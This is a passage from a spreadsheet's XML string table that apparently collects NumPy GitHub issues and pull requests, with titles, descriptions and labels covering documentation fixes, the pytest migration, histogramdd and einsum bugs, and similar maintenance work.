but the link goes to https://docs.python.org/dev/library/random.html#random.randint, when it should go to https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.randint.html ._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>DOC: Bad link to `np.random.randint</t>
  </si>
  <si>
    <t>The .appveyor.yml expects this file to exist, but pytest does not output it by default._x000D_
_x000D_
Let's see if this works...</t>
  </si>
  <si>
    <t>TST: Re-enable test display on appveyor</t>
  </si>
  <si>
    <t>Fixes #10756 _x000D_
_x000D_
Gist to verify that this is the correct parametrization of the distribution: https://gist.github.com/eric-wieser/ff601c74e42155fca209def371e46e81</t>
  </si>
  <si>
    <t>DOC: Fix negative binomial documentation.</t>
  </si>
  <si>
    <t>Fixes gh-6741, closes gh-9348_x000D_
_x000D_
If an object claims to support the PEP3118 buffer protocol, then any mistakes in the implementation should be raised as errors, rather than falling back on other approaches._x000D_
_x000D_
This has some behavior changes:_x000D_
_x000D_
* np.array(mem_view_33d) now gives a more useful error message than "memoryview: unsupported format &lt;B"_x000D_
* np.array(ctypes_pointer) now errors rather than creating an object array containing a single pointer_x000D_
_x000D_
Also adds support for 32-dimensional buffers, where previously the max was 31-dimensional.</t>
  </si>
  <si>
    <t>BUG: have `_array_from_buffer_3118` correctly handle errors</t>
  </si>
  <si>
    <t>I suppose `rundocs ()` does not work because of a line which precedes main docstring:_x000D_
    `from __future__ import division, absolute_import, print_function`_x000D_
_x000D_
env: `numpy                     1.14.2           py36h5c71026_1_x000D_
conda/4.5.0 requests/2.18.4 CPython/3.6.5 Windows/10 Windows/10.0.16299`</t>
  </si>
  <si>
    <t>Not working `rundocs()` in `numpy\lib\tests\test_polynomial.py`</t>
  </si>
  <si>
    <t>['06 - Regression', 'component: numpy.polynomial', 'component: numpy.testing']</t>
  </si>
  <si>
    <t>Added an example showing how to use multi-line commands in the Examples section of the docstring.</t>
  </si>
  <si>
    <t>DOC: Added example of multi-line instruction in Examples section of a docstring.</t>
  </si>
  <si>
    <t xml:space="preserve">This PR adds a new function `atleast_nd` which generalizes atleast_1d,  atleast_2d, and atleast_3d. I've been using this function internally for a few years now and I find it very useful to parameterize how many dimensions I'm expecting rather than hard coding it via a function name._x000D_
_x000D_
It's a pretty simple function so I won't write too much a description. The main differences from the existing functions is that it takes only one argument instead of varargs so it can accept `n` as the second parameter. Because the function doesn't use varargs._x000D_
_x000D_
I also added a third parameter `front` which specifies if the new dimensions should be appended to the front or back of the array shape. I defaulted this to `front=False` because in most cases I want to ensure that a channel dimension exists at the back of a 2d image. This seems to correspond to the current behavior of `np.atleast_3d` (was it always this way? I seem to remember it being different in the past). _x000D_
_x000D_
Lastly, a benchmark shows that there is an extremely marginal (0.5 µs) speed improvement to this function over using `np.atleast_3d`. _x000D_
_x000D_
```python_x000D_
        import ubelt_x000D_
        N = 100_x000D_
_x000D_
        t1 = ubelt.Timerit(N, label='mine')_x000D_
        for timer in t1:_x000D_
            arr = np.empty((10, 10))_x000D_
            with timer:_x000D_
                atleast_nd(arr, 3)_x000D_
_x000D_
        t2 = ubelt.Timerit(N, label='baseline')_x000D_
        for timer in t2:_x000D_
            arr = np.empty((10, 10))_x000D_
            with timer:_x000D_
                np.atleast_3d(arr)_x000D_
```_x000D_
```_x000D_
Timed mine for: 100 loops, best of 3_x000D_
    time per loop: best=2.087 µs, mean=2.12 ± 0.084 µs_x000D_
_x000D_
Timed baseline for: 100 loops, best of 3_x000D_
    time per loop: best=2.486 µs, mean=2.536 ± 0.043 µs_x000D_
```_x000D_
Not a big deal, but hey, it's there. _x000D_
_x000D_
-----------_x000D_
_x000D_
If anyone likes this feature let me know and I'll write the tests. </t>
  </si>
  <si>
    <t>ENH: New Function np.atleast_nd</t>
  </si>
  <si>
    <t xml:space="preserve">numpy.npv returns wrong value._x000D_
</t>
  </si>
  <si>
    <t>NPV function return wrong value</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.lib.financial']</t>
  </si>
  <si>
    <t>**Issue**_x000D_
I am implementing custom dtypes for symbolic types: Variable, Expression, Formula, where the algebra is more or less:_x000D_
* `&lt;ExpressionOperand&gt; ::= &lt;Variable&gt; | &lt;Expression&gt;`_x000D_
* `&lt;math_op&gt; ::= + | - | * | - | etc...`_x000D_
* `&lt;logical_op&gt; ::= == | != | &lt; | &lt;= | etc...`_x000D_
* `&lt;ExpressionOperand&gt; &lt;math_op&gt; &lt;ExpressionOperand&gt; -&gt; &lt;Expression&gt;`_x000D_
* `&lt;ExpressionOperand&gt; &lt;logical_op&gt; &lt;ExpressionOperand&gt; -&gt; &lt;Formula&gt;`_x000D_
I can more or less implement this for most of the operators by augmenting the existing UFuncs using `PyUFunc_RegisterLoopForType`._x000D_
_x000D_
However, for some builtin operations, like `dotfunc`, it seems that the C API is rigidly fixed to only providing closed operations for `dot`, `matmul`, etc., so I cannot define a meaningful `dot` produce for `Variable`, since the result of this operation should produce a `Expression`:_x000D_
https://github.com/RobotLocomotion/drake/pull/8452#issuecomment-379923025_x000D_
_x000D_
**Rambling**_x000D_
I am currently inspecting the source code for v1.11.0 (what I currently have on Ubuntu 16.04 LTS), and it seems that I can use `__numpy_ufunc__` (the old version of `__array_ufunc__` which was solidified in v1.13.0, it seems?), because:_x000D_
* `array_dot` (`methods.c`) calls `PyUFunc_CheckOverride` first to check if `numpy.core.multiarray.dot` can be overridden by a `ndarray` subclass_x000D_
* If no override is found, it uses `PyArray_MatrixProduct2`, which then calls `dotfunc`_x000D_
_x000D_
TBH, it seems that `PyUFunc_CheckOverride` could possibly be generalized to see if a compatible user loop has been registered for the `PyUFuncObject`, if no `__array_ufunc__` is available._x000D_
_x000D_
Looking at a recent `master` (`c486d8d`), it looks like this functionality is removed from `array_dot`, so I'm not sure where it's gone now._x000D_
_x000D_
Seeing [this footnote](https://docs.scipy.org/doc/numpy-1.13.0/neps/ufunc-overrides.html#id24) in the `__array_ufunc__` documentation, it seems that `matmul` is under consideration, but not `dot`?_x000D_
_x000D_
I am still generally concerned of subclassing `ndarray` for (a) version considerations (it seems that this feature is still relatively volatile) and (b) forcing downstream users to care about which `ndarray` subclass they use._x000D_
(That being said, is there a way to create a custom `dtype`, and then indicate which `ndarray` subclass should be used?)</t>
  </si>
  <si>
    <t>Permit `np.dot`, `np.matmul`, etc. return a type different from input arguments?</t>
  </si>
  <si>
    <t>['50 - Duplicate']</t>
  </si>
  <si>
    <t>Fixes issue #7895 by doing a replace('+-', '-') for complex numbers. That should never be a valid string in both writing and reading a complex number._x000D_
_x000D_
Tests added_x000D_
_x000D_
In the issue, there are comments tying this to issue #10436, I would prefer to solve them separately</t>
  </si>
  <si>
    <t>BUG: fix savetxt, loadtxt for '+-' in complex</t>
  </si>
  <si>
    <t>DOC: State in docstring that lexsort is stable (#10873).</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">#10847 _x000D_
_x000D_
@mhvk @eric-wieser </t>
  </si>
  <si>
    <t>ENH: Extend np.flip to work over multiple axes</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>This was just a place where the return type is hardcoded, and could become inconsistent</t>
  </si>
  <si>
    <t>MAINT: Remove unnecessary special case in np.histogramdd for N == 0</t>
  </si>
  <si>
    <t>```python_x000D_
&gt;&gt;&gt; dt = [('a', int), ('b', float)]_x000D_
&gt;&gt;&gt; np.rec.fromrecords([ [1, 1.5], [2, 2.5] ], dtype=dt)_x000D_
rec.array([[(1, 1. ), (1, 1.5)],_x000D_
           [(2, 2. ), (2, 2.5)]],_x000D_
          dtype=[('a', '&lt;i8'), ('b', '&lt;f8')])_x000D_
```_x000D_
_x000D_
while in 1.13.3 that would be:_x000D_
```python_x000D_
rec.array([(1,  1.5), (2,  2.5)], _x000D_
          dtype=[('a', '&lt;i8'), ('b', '&lt;f8')])_x000D_
```</t>
  </si>
  <si>
    <t>`np.rec.fromrecords` looks broken since 1.14.0</t>
  </si>
  <si>
    <t>While teaching numpy I was asked the best way to create an array of `nan`,_x000D_
and `np.full` seem not be cross linked from many places; In particular_x000D_
in the documentation of `zeros` and `ones` seam like obvious candidates_x000D_
to add them._x000D_
_x000D_
_x000D_
--- _x000D_
_x000D_
Here are two top answer on [Stack Overflow](https://stackoverflow.com/questions/1704823/initializing-numpy-matrix-to-something-other-than-zero-or-one) where user can can confused by [chaining `.fill(nan)`](https://stackoverflow.com/questions/22414152/best-way-to-initialize-and-fill-an-numpy-array) and get confused, and what the various options are.</t>
  </si>
  <si>
    <t>DOC: Cross Link full/full_like in a few see-also sections.</t>
  </si>
  <si>
    <t>This was clearly deliberate, as there's an explicit test:_x000D_
_x000D_
https://github.com/numpy/numpy/blob/c8a5f560f1eedd510ca5656b06dd1ca2ba9322bd/numpy/lib/tests/test_histograms.py#L628-L632_x000D_
_x000D_
It's implemented here:_x000D_
_x000D_
https://github.com/numpy/numpy/blob/c8a5f560f1eedd510ca5656b06dd1ca2ba9322bd/numpy/lib/histograms.py#L915-L921_x000D_
_x000D_
Why do we do this? It's:_x000D_
* Not documented_x000D_
* Inconsistent with `histogram`_x000D_
* Arbitrarily tied to base 10 in a bizarre way_x000D_
* Causing zero-width bins to fail_x000D_
* Possibly a workaround for loss of precision from us casting integer edges to float_x000D_
_x000D_
Is there any reason not to switch to:_x000D_
```python_x000D_
on_edge = sample[:, i] == edges[i][-1]_x000D_
# Shift these points one bin to the left. _x000D_
Ncount[i][on_edge] -= 1_x000D_
```_x000D_
_x000D_
Raised in https://github.com/numpy/numpy/pull/4284#issuecomment-36425095 and #9435</t>
  </si>
  <si>
    <t>histogramdd fuzzes the rightmost bin edge</t>
  </si>
  <si>
    <t>['component: numpy.lib']</t>
  </si>
  <si>
    <t>Lots of small and unrelated cleanups, each just a few lines. Submitted as one PR to minimize email noise, but the commits are self-contained._x000D_
_x000D_
This doesn't attempt to change any outward-facing behavior - it just makes the oddities (#7845, #10864) stand out more.</t>
  </si>
  <si>
    <t>MAINT: More Histogramdd cleanup</t>
  </si>
  <si>
    <t>This is a backport of #10763, for 1.14.3 in case we want it there._x000D_
_x000D_
Fixes #10753</t>
  </si>
  <si>
    <t>BUG: floating types should override tp_print (1.14 backport)</t>
  </si>
  <si>
    <t xml:space="preserve">Removes the remaining yield tests deprecated by pytest. The travis and appveyor tests are also adjusted to no longer ignore the pytest warnings._x000D_
_x000D_
The polynomial classes tests were parametrized, in the remaining cases the yield statements were simply replaced by function calls. The latter seems a bit crude, but the tests were not designed to be parametrized and there were also useful comments in the code that would have been lost in doing so. Because each yielded test was counted as separate, whereas the function calls are not, there has been a net decrease in the reported number of tests run._x000D_
_x000D_
There are also some style fixups, could not help myself. </t>
  </si>
  <si>
    <t>MAINT: Remove yield tests</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Stumbled upon this error:_x000D_
```python_x000D_
In [1]: np.unique(np.ones(8*10**9,dtype=np.float32))_x000D_
Out[1]: array([ 0.], dtype=float32)_x000D_
```_x000D_
But reducing size - 8*10**8 - helps to fix it._x000D_
```python_x000D_
In [2]: np.unique(np.ones(8*10**8,dtype=np.float32))_x000D_
Out[2]: array([ 1.], dtype=float32)_x000D_
```_x000D_
I wonder if it's issue with `sort` or any other routines..._x000D_
_x000D_
Makes me wonder if any of my Numpy codes are correct... since I deal with very big arrays normally._x000D_
_x000D_
Please help!_x000D_
</t>
  </si>
  <si>
    <t>np.unique is producing invalid output for constant big arrays</t>
  </si>
  <si>
    <t xml:space="preserve">* [x] use pytest markers_x000D_
* [x] use pytest for runtests and ci tests._x000D_
* [x] remove the `pytest_tools` directory._x000D_
* [x] remove `run_module_suite` from the test files._x000D_
* [x] fixup the remaining yield tests, warnings currently suppressed in ci testing._x000D_
* [x] test for nose dependencies by removing nose import from some ci tests._x000D_
* [ ] update documentation_x000D_
* [x] update `numpy-wheels`_x000D_
</t>
  </si>
  <si>
    <t>Switch to pytest</t>
  </si>
  <si>
    <t>['17 - Task']</t>
  </si>
  <si>
    <t>This PR addresses the fact that the recommended method for truncating undesired unpacked elements is currently to reshape and subset (e.g., [this SO post](https://stackoverflow.com/a/44962805/2988730)). This seems wasteful, especially for large arrays. Adding a `count` argument allows the unpacking to use only the desired number of bits, requiring no extra memory._x000D_
_x000D_
The suggested parameter is pretty straightforward: it will be the final size of the output array along the desired axis. It will error out if you ask for more bits than there are in the data. Negative values indicate how many to trim (so for example, when unpacking a mask of `width` bits from a regular `packbits` invocation, use `-(width % 8)`), and None is the existing default behavior (use everything)._x000D_
_x000D_
There is also a fix to the existing docs, which do not accurately reflect the name of the first parameter to `[un]packbits` correctly.</t>
  </si>
  <si>
    <t>ENH: Adding a count parameter to np.unpackbits</t>
  </si>
  <si>
    <t>The following modules have been moved or renamed and should not be_x000D_
imported. This adds shim modules for the old names that issue a_x000D_
DeprecationWarning on import._x000D_
_x000D_
* numpy/core/umath_tests.py_x000D_
* numpy/testing/decorators.py_x000D_
* numpy/testing/noseclasses.py_x000D_
* numpy/testing/nosetester.py_x000D_
* numpy/testing/utils.py_x000D_
_x000D_
Closes #10845.</t>
  </si>
  <si>
    <t>DEP: Issue deprecation warnings for some imports.</t>
  </si>
  <si>
    <t>['07 - Deprecation', 'component: numpy.core', 'component: numpy.testing']</t>
  </si>
  <si>
    <t xml:space="preserve">Some line breaks messed up the doc string for np.flip docs [here](https://docs.scipy.org/doc/numpy-dev/reference/generated/numpy.flip.html#numpy.flip)._x000D_
_x000D_
When those line breaks are removed, it looks like this, generated locally:_x000D_
![now](https://user-images.githubusercontent.com/673681/38319416-012f6c50-3832-11e8-88c2-27a9e355caa8.png)_x000D_
</t>
  </si>
  <si>
    <t>DOC: fix examples in docstring for np.flip</t>
  </si>
  <si>
    <t xml:space="preserve">I dunno the reasons, but `np.roll` is significantly slower than `np.concatenate`._x000D_
_x000D_
```python_x000D_
In [1]: import numpy as np_x000D_
_x000D_
In [2]: d = np.arange(99)_x000D_
_x000D_
In [3]: %timeit np.roll(d, 1)_x000D_
15 µs ± 250 ns per loop (mean ± std. dev. of 7 runs, 100000 loops each)_x000D_
_x000D_
In [4]: %timeit np.concatenate([d[-1:],d[:-1]])_x000D_
1.26 µs ± 10.4 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>np.roll significantly slower than np.concatenate</t>
  </si>
  <si>
    <t>I suggest autoflipping 1d arrays without specifying axis:_x000D_
_x000D_
``` python_x000D_
a = np.array([1, 2, 3])_x000D_
b = np.flip(a)_x000D_
```_x000D_
instead of_x000D_
`b = np.flip(a, 0)`_x000D_
_x000D_
`fliplr` doesn't work in this case, and `flip` can easily check input's `ndim`.</t>
  </si>
  <si>
    <t>[Enhancement] Add axis-less flip for 1d arrays</t>
  </si>
  <si>
    <t>['23 - Wish List', 'component: numpy.lib', 'good first issue']</t>
  </si>
  <si>
    <t>At https://docs.scipy.org/doc/numpy-dev/ I see this:_x000D_
_x000D_
&gt; NumPy v1.13.dev0 Manual_x000D_
&gt; Welcome! This is the documentation for NumPy 1.13.0.dev0+a5d71d6, last updated Jan 16, 2017._x000D_
_x000D_
That's over a year old._x000D_
_x000D_
Can you please update it to the show the latest dev docs, or redirect to the proper place if they exist somewhere else?</t>
  </si>
  <si>
    <t>Outdated https://docs.scipy.org/doc/numpy-dev/</t>
  </si>
  <si>
    <t>This switches numpy testing to pytest instead of nose. The nose specific tools remain available for downstream projects that may have depended on them, but NumPy itself should have no nose dependencies. There will be a follow on cleanup PR(s) that will do the following:_x000D_
_x000D_
* remove the `pytest_tools` directory._x000D_
* remove `run_module_suite` from the test files._x000D_
* fixup the remaining yield tests, warnings currently suppressed in ci testing._x000D_
* test for nose dependencies by removing nose import from some ci tests._x000D_
* update documentation_x000D_
* update `numpy-wheels`_x000D_
_x000D_
There is currently no requirement for pytest version. Does anyone have a suggestion?_x000D_
_x000D_
@njsmith You previously noted that `runtests` was not suitable for ci testing. Could you review your reasoning? Scipy and the NumPy appveyor tests are using `runtests`, and I'd like to use it for travis also._x000D_
_x000D_
See #10856 for checklist of tasks.</t>
  </si>
  <si>
    <t>TST: Switch to pytest</t>
  </si>
  <si>
    <t>['01 - Enhancement', '05 - Testing']</t>
  </si>
  <si>
    <t>This code leaks:_x000D_
while True:_x000D_
   a = numpy.random.randint(10)_x000D_
_x000D_
replacement by following works fine:_x000D_
   a = int(numpy.random.rand() * 10)</t>
  </si>
  <si>
    <t>Memory leak numpy.random.randint in 1.14.0</t>
  </si>
  <si>
    <t>MAINT: Fix typo in code example.</t>
  </si>
  <si>
    <t>Passing a clearly positive definite covariance matrix with `float32` data type causes the warning_x000D_
_x000D_
&gt; RuntimeWarning: covariance is not positive-semidefinite._x000D_
_x000D_
Using the same matrix with `float64` does not raise the warning._x000D_
_x000D_
Steps to reproduce:_x000D_
_x000D_
```_x000D_
import numpy as np_x000D_
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)_x000D_
np.random.multivariate_normal([0, 0], cov)_x000D_
```_x000D_
_x000D_
This was raised as a [question at StackOverflow](https://stackoverflow.com/q/49624840/3005167)._x000D_
_x000D_
_x000D_
I suspect that the behavior may be related to the way the function's `tol` argument is passed to both `rtol` and `atol` in [`psd = np.allclose(np.dot(v.T * s, v), cov, rtol=tol, atol=tol)`](https://github.com/ozabluda/numpy/blob/08a02daa3f86e84df143d508949562f8881576c2/numpy/random/mtrand/mtrand.pyx#L4529). The default of `tol=1e-8` is much lower than `np.isclose`'s default for `rtol=1e-5`.</t>
  </si>
  <si>
    <t>multivariate_normal warns about non-PSD covariance for float32 inputs</t>
  </si>
  <si>
    <t>['component: numpy.random']</t>
  </si>
  <si>
    <t>Hello guys!_x000D_
  I am using windows 10 home edition, python 3.6, Anaconda, and PyCharm as IDE._x000D_
After I entered the code below:_x000D_
_x000D_
import numpy as np_x000D_
a = np.array([1])_x000D_
np.tile(a, 5)_x000D_
print(a)_x000D_
b = np.array([2])_x000D_
np.repeat(a, 5)_x000D_
print(b)_x000D_
_x000D_
It showed me the result as:_x000D_
[1]_x000D_
[2]_x000D_
_x000D_
I think my numpy.repeat and numpy.tile did not work at all._x000D_
Does anyone know what happened to this code? Did I do something wrong?_x000D_
_x000D_
Thank you very much!</t>
  </si>
  <si>
    <t>numpy.repeat and numpy.tile don't work at all</t>
  </si>
  <si>
    <t>['53 - Invalid']</t>
  </si>
  <si>
    <t>MAINT: Fix script name for pushing NEP docs to repo</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: NEP']</t>
  </si>
  <si>
    <t>DOC: note that NDEBUG should be set when OPT should increase optimization</t>
  </si>
  <si>
    <t>RISC-V (pronounced "RISC Five") is an open source instruction set_x000D_
architecture (ISA). The 64-bit version may run the Linux kernel and the_x000D_
usual stack of applications on top of it, including Python._x000D_
_x000D_
This patch adds support for riscv64 to Numpy. With it the full testsuite_x000D_
passes for both Python 2.7 and 3.6, with the only exception of_x000D_
test_float (test_numeric.TestBoolCmp). See #8213 for details._x000D_
_x000D_
Closes: #8213</t>
  </si>
  <si>
    <t>ENH: Add support for the 64-bit RISC-V architecture</t>
  </si>
  <si>
    <t>Found via `codespell -q 3 -I ../numpy-whitelist.txt`</t>
  </si>
  <si>
    <t>DOC: Fix minor typos</t>
  </si>
  <si>
    <t>The warning type is the second, not the first, argument.</t>
  </si>
  <si>
    <t>BUG: Fix obvious warning bugs.</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.testing']</t>
  </si>
  <si>
    <t>BLD: use Python 3.6 instead of 2.7 as default for doc build.</t>
  </si>
  <si>
    <t>This broke the doc build. Will deal with the import in the wrong place later; came via Sphinx so not completely obvious to fix.</t>
  </si>
  <si>
    <t>BUG: fix obvious mistake in testing/decorators warning.</t>
  </si>
  <si>
    <t>This PR does two things_x000D_
_x000D_
* Removes 'bench' from the testing packages `__init__` files, it isn't used anymore_x000D_
* Updates the `pytest.ini` file._x000D_
* Adds `pytesttester.py` that provides `PytestTester` for pytest testing._x000D_
_x000D_
Actual testing with pytest will wait on another PR, but the new pytesttester has been tested to work as well as can be expected without the full suite of changes to come._x000D_
_x000D_
This PR is for getting the code under review. It is possible to combine it with the final switch to pytest if desired, but  this is an opportunity to examine the addition in isolation.</t>
  </si>
  <si>
    <t>ENH: Add tester for pytest.</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.testing']</t>
  </si>
  <si>
    <t>I tried to patch this issue; the descriptions of the fix make it sound a little obscure, but to be fair it is a little bit tricky to think about since it seems to be about respecting an old API and preventing a silent success / enforcement of new API._x000D_
_x000D_
* Fixes Issue #10779 by removing the interception of_x000D_
an otherwise normal Exception when an object implemented_x000D_
with the expectation that squeeze() does not accept an_x000D_
axis argument receives an axis argument_x000D_
_x000D_
* Added unit tests that enforce respect for the old API_x000D_
expectation in objects, and ensure that silent success_x000D_
(or forced usage of the new API on objects) is no longer_x000D_
the case_x000D_
_x000D_
* Updated compatibility notes to explain this change</t>
  </si>
  <si>
    <t>BUG: np.squeeze() now respects older API axis expectation</t>
  </si>
  <si>
    <t>PyArray_DiscardWritebackIfCopy was not properly detaching `self` from `self-&gt;base`, as a consequence it left a ref to ``self-&gt;base`` dangling. This tests and fixes the function, and more clearly documents both ``PyArray_DiscardWritebackIfCopy`` and ``PyArray_ResolveWritebackIfCopy``</t>
  </si>
  <si>
    <t>BUG: test, fix PyArray_DiscardWritebackIfCopy refcount issue and docu…</t>
  </si>
  <si>
    <t>Handles case when names is set to True and comments is set to None by the user._x000D_
_x000D_
Closes #10780</t>
  </si>
  <si>
    <t>BUG: fixes exception in numpy.genfromtxt, see #10780</t>
  </si>
  <si>
    <t>As per @rgommers's advice, I am moving scipy/scipy#8606 to here._x000D_
_x000D_
The numpy testing guideline does not appear to be built with the other docs. It renders adequately on GitHub (https://github.com/numpy/numpy/blob/master/doc/TESTS.rst.txt), but seems out of place._x000D_
_x000D_
This is noticeable in particular because the scipy docs link to the GitHub page. The section on unit tests under the "Contributing New Code" section of the "Contributing to SciPy" page (http://scipy.github.io/devdocs/hacking.html#contributing-new-code) has a link to the "testing guidelines", which points here._x000D_
_x000D_
Given that this page (probably among others) is important enough to link across projects, it would probably be a good idea to include it in the generated docs._x000D_
_x000D_
On top of the fact that the page is missing, it still refers to the old `nose` testing setup, and should probably be updated to include the switchover to `py.test`.</t>
  </si>
  <si>
    <t>Testing guideline page is obsolete and not built in main docs</t>
  </si>
  <si>
    <t>On some systems you can disable avx registers but the gcc builtin does_x000D_
only checks if the cpu has the feature._x000D_
Before using avx functions check the OS support with xgetbv._x000D_
Closes gh-10787_x000D_
Closes gh-9534</t>
  </si>
  <si>
    <t>BUG: verify the OS supports avx instruction</t>
  </si>
  <si>
    <t xml:space="preserve">Prepare for follow on PR switching to pytest_x000D_
_x000D_
* Create `numpy/testing/_private/ directory`._x000D_
  * Add `_testutils.py` from scipy to it._x000D_
  * Add `nose_tools/noseclasses.py` to it_x000D_
  * Add `nose_tools/nosetester.py` to it_x000D_
  * Add `nose_tools/parameterize.py` to it_x000D_
  * Add `nose_toos/decorators.py` to it_x000D_
* Copy `nose_tools/utils.py` to `numpy/testing`_x000D_
* Redirect imports as needed._x000D_
* Delete the `nose_tools` directory and all in it._x000D_
* Rename `_testutils.py` to `_pytester.py`._x000D_
    _x000D_
The `_testutils.py` file comes from scipy with scipy specific bits removed for numpy._x000D_
</t>
  </si>
  <si>
    <t>MAINT: Rearrange `numpy/testing` files</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.testing']</t>
  </si>
  <si>
    <t>[ISO 8601 allows you to put a sign before the year](https://en.wikipedia.org/wiki/ISO_8601#Years) in order to be able to represent BC dates. NumPy handles BC dates nicely:_x000D_
_x000D_
    import numpy as np_x000D_
    np.datetime64('-1000-01-01T00:00:00Z')  # No error_x000D_
_x000D_
However, when giving an AC date starting with a `+` sign it fails:_x000D_
_x000D_
    import numpy as np_x000D_
    np.datetime64('+1000-01-01T00:00:00Z')  # ValueError_x000D_
_x000D_
Python 3.6.3 | Anaconda_x000D_
NumPy 1.13.3_x000D_
Windows 10 x64</t>
  </si>
  <si>
    <t>datetime64 cannot parse dates starting with a positive sign</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.core', 'good first issue']</t>
  </si>
  <si>
    <t xml:space="preserve">Title self explanatory._x000D_
_x000D_
Code to reproduce._x000D_
```_x000D_
&gt;&gt;&gt; a = _np.array([10], dtype='uint8')_x000D_
&gt;&gt;&gt; a += -1_x000D_
```_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;debug input&gt;", line 1, in &lt;module&gt;_x000D_
TypeError: Cannot cast ufunc add output from dtype('int16') to dtype('uint8') with casting rule 'same_kind'_x000D_
</t>
  </si>
  <si>
    <t>Using the += &lt;negatve integer&gt; with arrays of dtype uint8 errors, even when the subtraction will not produce a negative value in the array</t>
  </si>
  <si>
    <t>DOC: Update link to tox in development docs (#10806)</t>
  </si>
  <si>
    <t xml:space="preserve">There's a possibility of confusion from the `np.random.uniform` documentation, which says:_x000D_
_x000D_
&gt; Samples are uniformly distributed over the half-open interval [low, high) (includes low, but excludes high)._x000D_
_x000D_
Arguably, that's true, in the sense that we're using an expression that (mathematically) draws from `[low, high)`, but rounding and numerical errors mean that in practice, `high` _can_ be generated:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; low = 1.0_x000D_
&gt;&gt;&gt; high = 1.0 + 2**-40_x000D_
&gt;&gt;&gt; low, high, low &lt; high_x000D_
(1.0, 1.0000000000009095, True)_x000D_
&gt;&gt;&gt; np.random.uniform(low, high, size=10**6).max() == high_x000D_
True_x000D_
```_x000D_
_x000D_
The current documentation leads to people (well, at least one SO user) writing things like `np.random.uniform(low, np.nextafter(high, np.inf))` when they want a closed interval, which probably isn't a good idea:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; np.random.uniform(low, np.nextafter(high, np.inf), size=10**6).max() &gt; high_x000D_
True_x000D_
```_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>random.uniform documentation suggests `high` is excluded</t>
  </si>
  <si>
    <t>Split into small commits, one piece at a time._x000D_
_x000D_
Fixes gh-8531._x000D_
_x000D_
Happy to split these commits into multiple PRs, if needed.</t>
  </si>
  <si>
    <t>BUG/DOC/MAINT: Tidy up histogramdd</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', '04 - Documentation', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>Some ufuncs already mentioned this, but it seems sensible for all of them to describe it in exactly the same way.</t>
  </si>
  <si>
    <t>DOC: Add remarks about array vs scalar output to every ufunc</t>
  </si>
  <si>
    <t>* unravel_index() now supports the `shape` argument_x000D_
(Fixes #10586) while retaining backwards compatibility_x000D_
for the `dims` argument_x000D_
_x000D_
* added corresponding unit tests and docstring_x000D_
changes_x000D_
_x000D_
* I note that the warning subclass type that I use might need to_x000D_
be changed to some type of Deprecation if that's desired?</t>
  </si>
  <si>
    <t>DEP: Updated `unravel_index()` to support `shape` kwarg</t>
  </si>
  <si>
    <t>The input arguments to inplace operations can overlap for accumulate operations where `out[i+1] = in[i] + out[i]`. That breaks the no loop carried dependency assumptions the compiler has due to the ivdep pragma that is required for GCC to vectorize the loop. Currently this does no harm because accumulate operations are out of place, but future enhancements may change that._x000D_
_x000D_
Fix this by verifying the arguments do not overlap within a hardware_x000D_
vector size. As we do not know the vector size of future machines use an extremely_x000D_
large value of 1024 bytes (commodity hardware currently has at most 64bytes)_x000D_
_x000D_
Closes gh-10664</t>
  </si>
  <si>
    <t>BUG: fix wrong inplace vectorization on overlapping arguments</t>
  </si>
  <si>
    <t>Also produce more useful error messages_x000D_
_x000D_
Fixes gh-10794</t>
  </si>
  <si>
    <t>BUG: Allow spaces in output string of einsum</t>
  </si>
  <si>
    <t>```python_x000D_
&gt;&gt;&gt; x = np.eye(1)_x000D_
&gt;&gt;&gt; np.einsum('...ab, ...bc -&gt;...ac', x, x)_x000D_
np.array([[1.]])_x000D_
&gt;&gt;&gt; np.einsum('...ab, ...bc -&gt; ...ac', x, x)_x000D_
ValueError: einstein sum subscripts string contains a '.' that is not part of an ellipsis ('...')_x000D_
```</t>
  </si>
  <si>
    <t>BUG: einsum rejects spaces around ellipsis:</t>
  </si>
  <si>
    <t xml:space="preserve">This PR does the following in preparation for the pytest switch:_x000D_
_x000D_
* Moves the contents of `numpy/testing/nose_tools` to `numpy/testing`_x000D_
* Moves `numpy/testing/pytest_tools/decorators.py` to `numpy/testing/pytestdecorators`_x000D_
* Deletes the `numpy/testing/nose_tools` and `numpy/testing/pytest_tools`_x000D_
_x000D_
At this point it is possible to run both nose and pytest tests. The next PR in this series will switch to pytest and delete the `numpy/testing/pytestdecorators` file. At that point NumPy can no longer be tested with nose._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Rearrange `numpy/testing` directory to prepare for pytest.</t>
  </si>
  <si>
    <t>I run into this error being thrown when doing double summation on tensors with legs with different dimensions._x000D_
It looks a lot like #5147 which was solved previously._x000D_
This is a minimal example (dimensions and array values are unimportant to the problem):_x000D_
```_x000D_
a=np.arange(4).reshape(1,1,2,1,2)_x000D_
np.einsum('bbcdc-&gt;d,a)_x000D_
```_x000D_
returns_x000D_
```ValueError: dimensions in operand 0 for collapsing index 'd' don't match (1 != 2)```._x000D_
_x000D_
Summing `b` and `c` separately works as do the following examples:_x000D_
```_x000D_
a=np.arange(4).reshape(1,1,2,2,1)_x000D_
np.einsum('bbccd-&gt;d,a)_x000D_
_x000D_
a=np.arange(8).reshape(1,1,2,2,2)_x000D_
np.eisum('bbcdc-&gt;d,a)_x000D_
```</t>
  </si>
  <si>
